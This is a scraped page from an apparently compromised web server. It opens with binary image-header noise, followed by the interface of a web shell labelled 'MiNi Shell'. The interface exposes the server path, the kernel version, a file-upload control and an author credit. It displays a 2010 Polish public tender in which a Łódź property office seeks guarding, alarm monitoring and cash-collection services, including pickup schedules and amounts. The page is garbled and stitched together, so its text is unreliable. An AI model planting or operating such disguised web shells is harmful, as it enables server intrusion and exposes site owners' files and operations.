JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100715/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100715/211338-N-2010.html

<p class="kh_header"><b>Łódź: świadczenie na rzecz Administracji Nieruchomościami Łódź- Śródmieście Centrum II usługi ochrony fizycznej mienia, monitoring, ochronę transportu wartości pieniężnych - inkaso</b><br>
<b>Numer ogłoszenia: 211338 - 2010; data zamieszczenia: 15.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Administracja Nieruchomościami Łódź-Śródmieście "Centrum II" , ul. Dowborczyków 5, 90-019 Łódź, woj. łódzkie, tel. 042 2536419, faks 042 2536422.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.centrum2.com3.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> świadczenie na rzecz Administracji Nieruchomościami Łódź- Śródmieście Centrum II usługi ochrony fizycznej mienia, monitoring, ochronę transportu wartości pieniężnych - inkaso.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> świadczenie na rzecz Zamawiającego usługi stałej, bezpośredniej ochrony fizycznej mienia. Zamawiający wymaga, aby Wykonawca przy pomocy wskazanych  przez siebie pracowników ochrony sprawował stałą, bezpośrednią ochronę fizyczną mienia  budynków,  pomieszczeń oraz rzeczy znajdujących się w tych pomieszczeniach, monitorowania sygnałów lokalnego systemu alarmowego w nieruchomości  położonej w Łodzi przy  ul. Dowborczyków 5 (poprzeczna  i tylna oficyna)  budynek biurowy - w którym znajduje się między innymi siedziba AN CII, oraz ochrona    transportu wartości pieniężnych-inkaso na warunkach określonych w projekcie umowy załącznik nr 9.Zakres czynności obejmuje:

1.1	Bezpośrednią ochronę fizyczną osób i mienia:

- Bezpośrednia ochrona fizyczna osób i mienia przez jednego pracownika ochrony w dni robocze w godzinach 15oo - 20oo
Maksymalna ilość godzin pracy wartowników w okresie realizacji zamówienia wynosi 1275. 
- Wartownik podejmując służbę wprowadza wpis potwierdzony podpisem i godziną w książce służby, dokonuje obchodu terenu 
- Wartownik będzie wydawał klucze od poszczególnych pomieszczeń zajmowanych przez Administrację, korytarzy, pomieszczeń socjalnych i toalet osobom upoważnionym do ich sprzątania. Po zakończonej pracy, osoby sprzątające będą przekazywały klucze Wartownikowi, który po uprzednim sprawdzeniu, czy wszystkie pomieszczenia zostały prawidłowo zamknięte załączy wewnętrzny system alarmowy przed zakończeniem służby.
- Wartownik ma obowiązek regularnego obchodu obiektu : przynajmniej trzy razy                          w godzinach swojej pracy - każdy obchód będzie potwierdzony wpisem do książki służby.
- Wartownik w trakcie służby nie jest uprawniony do dokonywania jakichkolwiek czynności nie związanych z ochroną a w szczególności nie ma prawa do korzystania z telefonów, faksów, komputerów oraz do przeglądania dokumentów znajdujących się w lokalach.
- W razie niebezpieczeństwa wartownik ma obowiązek zawiadomienia Zleceniodawcy, Zleceniobiorcy oraz odpowiednich służb zwłaszcza Policji, Straży Pożarnej i Pogotowia.

1.2. Monitorowanie sygnałów lokalnego systemu alarmowego oraz podejmowania interwencji w w/w obiekcie.

- Monitorowanie sygnałów lokalnego systemu alarmowego polegać będzie na przyjmowaniu sygnałów z lokalnego systemu alarmowego oraz przekazywaniu odpowiadających tym sygnałom informacji wskazanym przez Zamawiającego osobom lub instytucjom
- Zleceniobiorca zobowiązuje się do podejmowania interwencji na każdy sygnał alarmowy odebrany przez centrum monitorowania z lokalnego systemu alarmowego lub                               w uzasadnionych przypadkach na wezwanie pracownika ochrony wykonującego swoje obowiązki w siedzibie Zamawiającego. Grupa interwencyjna będzie liczyła minimum dwie osoby ,
- Interwencja zmierzać ma do udaremnienia powstania szkody w  mieniu Zleceniodawcy
- Monitorowanie sygnałów lokalnego systemu alarmowego odbywa się w systemie całodobowym,
- Interwencja zostanie podjęta :
w godzinach 19,00 -   6,00  - w czasie   5 minut,
w godzinach   6,00 - 19,00 -  w czasie  15 minut

1.3. Ochrona transportu wartości pieniężnych - inkaso

- Odbiór wartości pieniężnych opakowanych w Bezpieczną Kopertę (lub inny przedmiot               o podobnym zastosowaniu) w kwocie wskazanej na bankowym dowodzie wpłaty przygotowanym przez kasjera Zamawiającego, 
dwa razy w tygodniu:
wtorki  w godzinach 16oo -163o
piątki w godzinach   143o -15oo
oraz w jednostkowych przypadkach (1-2 razy w miesiącu) na żądanie - wezwanie telefoniczne poza wyznaczonymi dniami tygodnia 
(Bezpieczne Koperty zostaną Zamawiającemu przekazane przez Zleceniobiorcę- ich koszt należy wliczyć w cenę usługi inkasa )
- konwojowaniu i dostarczeniu wartości pieniężnych / depozytów bankowych/ odebranych od kasjera, z zastosowaniem zabezpieczeń wymaganych przez przepisy dotyczące ochrony wartości pieniężnych w tym w szczególności przewidziane w Rozporządzeniu Ministra Spraw Wewnętrznych i Administracji z 14.10.1998r (Dz.U.129 poz 858 z późn.zm) i dostarczanie wartości pieniężnych do banku prowadzącego rachunek Zamawiającego. Od momentu przyjęcia bezpiecznej koperty Zleceniobiorca ponosi  pełną odpowiedzialność za jej zniszczenie, utratę lub zagarnięcie, do momentu zdeponowania w Banku Zleceniodawcy. Zleceniobiorca nie ponosi odpowiedzialności  za zgodność deklarowanych, na bezpiecznych kopertach kwot z dokumentami kasowymi i bankowymi w przypadkach dostarczenia bezpiecznej koperty w formie nienaruszonej.
- Przewidywane wielkości kwot do dostarczenia do banku kształtują się średnio w przedziale 400000 złotych miesięcznie.
- Planowana ilość konwojów w miesiącu 9-10..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4, 60.10.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy winni udokumentować, że posiadają aktualną koncesję na prowadzenie działalności w zakresie ochrony osób i mienia oraz wartości pieniężnych,   	Ocena spełniania w/w  warunków udziału w postępowaniu dokonywana zostanie  zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte  w dokumentach i oświadczeniach. wyszczególnionych w pkt. 6 niniejszej SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki wykonawca spełnił. Nie spełnienie chociażby jednego z w/w warunków skutkować będzie wykluczeniem Wykonawcy z postępowania.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy winni  udokumentować posiadanie wiedzy i doświadczenia poprzez wykazanie  wykonania minimum dwóch  kontraktów, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług porównywalnych swoim rodzajem z usługami stanowiącymi przedmiot zamówienia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy w tym okresie z podaniem ilości przedmiotu, dat wykonywania i odbiorców  - załącznik nr 4 oraz załączeniem dokumentów (referencji) potwierdzających , że usługi te obejmowały swoim zakresem przedmiot zamówienia oraz wykonano je należycie.  Do usług  w trakcie realizacji należy załączyć potwierdzenie czy usługi te są wykonywane należycie. Ocena spełniania w/w  warunków udziału w postępowaniu dokonywana zostanie  zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte  w dokumentach i oświadczeniach. wyszczególnionych w pkt. 6 niniejszej SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki wykonawca spełnił. Nie spełnienie chociażby jednego z w/w warunków skutkować będzie wykluczeniem Wykonawcy z postępowania.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy winni udokumentować dysponowanie sprzętem technicznym niezbędnym do realizacji zamówienia  wraz z informacją o podstawie dysponowania  tymi zasobami  w tym:  -  1 telefon komórkowy, w który zostanie wyposażony pracownik ochrony  (wartownik wykonujący zamówienie na terenie nieruchomości położonej w Łodzi przy  
ul. Dowborczyków 5) , 
- minimum 1 środek transportu przystosowany do bezpiecznego przewozu wartości pieniężnych mający stałą łączność z centralą oraz patrolami interwencyjnymi,
- minimum 5 pojazdów dla grup interwencyjnych,
- stacja monitorowania radiowego zagrożeń alarmowych oraz posiadanie wewnętrznego środka łączności -  załącznik nr 5 
Ocena spełniania w/w  warunków udziału w postępowaniu dokonywana zostanie  zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte  w dokumentach i oświadczeniach. wyszczególnionych w pkt. 6 niniejszej SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki wykonawca spełnił. Nie spełnienie chociażby jednego z w/w warunków skutkować będzie wykluczeniem Wykonawcy z postępowania.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy winni udokumentować dysponowanie osobami zdolnymi do wykonania usług objętych zamówieniem , poprzez wykazanie osób , które będą uczestniczyć w wykonywaniu usług wraz z informacjami na temat ich kwalifikacji zawodowych , doświadczenia i wykształcenia niezbędnych do wykonywania zamówienia, zakresu wykonywanych czynności oraz informacją o podstawie do dysponowania tymi osobami . Zamawiający wymaga aby każda z osób skierowanych do realizacji zadania posiadała minimum 6 miesięczny staż pracy  polegający na pełnieniu obowiązków porównywalnych z tymi, które zostaną im powierzone do realizacji niniejszego zamówienia ( staż pracy winien być nabyty w ciągu ostatnich trzech lat kalendarzowych licząc od dnia składania ofert )
Zamawiający wymaga aby do realizacji zostali skierowani nie karani pracownicy pełniący funkcje:
- minimum jeden wartownik, 
- minimum 10 pracowników  5 grup interwencyjnych jakie posiada oferent na terenie Łodzi pozostającymi w stałej gotowości do podjęcia natychmiastowej reakcji,
-  minimum 2 pracowników ochrony skierowanych do odbioru wartości pieniężnych                z kasy Zamawiającego,
- minimum jedna osoba upoważniona przez Oferenta do kontaktów z Zamawiającym                w trakcie realizacji zamówienia -  załącznik nr 6 
oświadczenie , że osoby , które będą uczestniczyć w wykonywaniu zamówienia 
 posiadają wymagane uprawnienia         Ocena spełniania w/w  warunków udziału w postępowaniu dokonywana zostanie  zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte  w dokumentach i oświadczeniach. wyszczególnionych w pkt. 6 niniejszej SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki wykonawca spełnił. Nie spełnienie chociażby jednego z w/w warunków skutkować będzie wykluczeniem Wykonawcy z postępowania.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy winni udokumentować, że posiadają polisę ubezpieczeniową lub inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności, w tym działalności zgodnej  przedmiotem niniejszego zamówienia na kwotę minimum 100 000,00 zł.
W przypadku gdy okres ważności polisy jest   krótszy od    terminu związania ofertą -należy załączyć zobowiązanie - oświadczenie Wykonawcy do przedłużenia ważności ubezpieczenia na czas realizacji zamówienia        
W  przypadku  opłacania  polisy  w  kilku  częściach  należy również załączyć dokument   potwierdzający opłacenie ostatniej składki.
Ocena spełniania w/w  warunków udziału w postępowaniu dokonywana zostanie  zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte  w dokumentach i oświadczeniach. wyszczególnionych w pkt. 6 niniejszej SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki wykonawca spełnił. Nie spełnienie chociażby jednego z w/w warunków skutkować będzie wykluczeniem Wykonawcy z postępowania.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>oświadczenie , że osoby , które będą uczestniczyć w wykonywaniu zamówienia 
 posiadają wymagane uprawnienia    W  przypadku  opłacania  polisy  w  kilku  częściach  należy również załączyć dokument  
   potwierdzający opłacenie ostatniej składki.
          W przypadku gdy okres ważności polisy jest   krótszy od    terminu związania ofertą - 
         należy załączyć zobowiązanie - oświadczenie Wykonawcy do przedłużenia ważności  
         ubezpieczenia na czas realizacji zamówienia,</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art.144 ust.1 ustawy, Zamawiający zastrzega możliwość zmiany przyszłej umowy w przypadku wystąpienia okoliczności nie wynikających z winy Wykonawcy ani Zamawiającego, których nie można było przewidzieć w chwili zawarcia umowy a zrealizowanie założonego pierwotnie celu umowy byłoby bez tych zmian niemożliwe lub zmiany te są korzystne dla Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.centrum2.com3.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Administracja Nieruchomościami Łódź - Śródmieście Centrum II ul. Dowborczyków 5 90-019 Łódź , pokój 15..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.07.2010 godzina 10:30, miejsce: Administracja Nieruchomościami Łódź - Śródmieście Centrum II ul. Dowborczyków 5 90-019 Łódź , pokój 19..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com